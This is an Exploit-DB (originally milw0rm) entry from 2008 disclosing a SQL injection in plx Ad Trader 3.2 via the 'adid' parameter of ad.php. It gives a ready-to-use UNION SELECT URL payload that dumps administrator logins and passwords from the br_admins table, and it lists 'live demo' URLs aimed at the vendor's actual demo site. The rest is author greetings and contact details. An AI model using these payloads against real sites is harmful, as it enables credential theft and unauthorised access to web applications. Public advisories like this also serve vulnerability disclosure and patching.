plx Ad Trader 3.2 - 'adid' SQL Injection

EDB-ID:

5988

Author:

Hussin X

Type:

webapps

Platform:

PHP

Published:

2008-07-01

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@     plx Ad Trader v3.2  SQL Injection Vulnerability
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@    Author: Hussin X                                   @
@                                                       @
@    Home :  www.tryag.cc/cc                            @
@                                                       @
@    email:  darkangel_g85[at]Yahoo[DoT]com             @
@            hussin.x[at]hotmail[DoT]com                @
@                                                       @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@    
@
@    HomE script : http://plxwebdev.com
@
@    DeMo        : http://plxwebdev.com/demos/plxadtrader                              
@                                                      
@                                                      
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@
@
@

ExPloiT :

www.[target].com/Script/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+concat_ws(0x3a,login,pass)+from+br_admins-- 



L!VE DEMO :

USER

http://plxwebdev.com/demos/plxadtrader/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+login+from+br_admins--

PASSWORD

http://plxwebdev.com/demos/plxadtrader/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+pass+from+br_admins--


@
@
@
@@@@@@@@@@@@@@@@@@@@@@@( Greetz )@@@@@@@@@@@@@@@@@@@@@@@@
@                                                       @
@ TrYaG.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR       @
@                                                       @
@          str0ke / FAHD  /Iraqihack / Silic0n          @
@@@@@@@@@@@@@@@@@                       @@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@(and All IRAQIs)@@@@@@@@@@@@@@@@@@@@

# milw0rm.com [2008-07-01]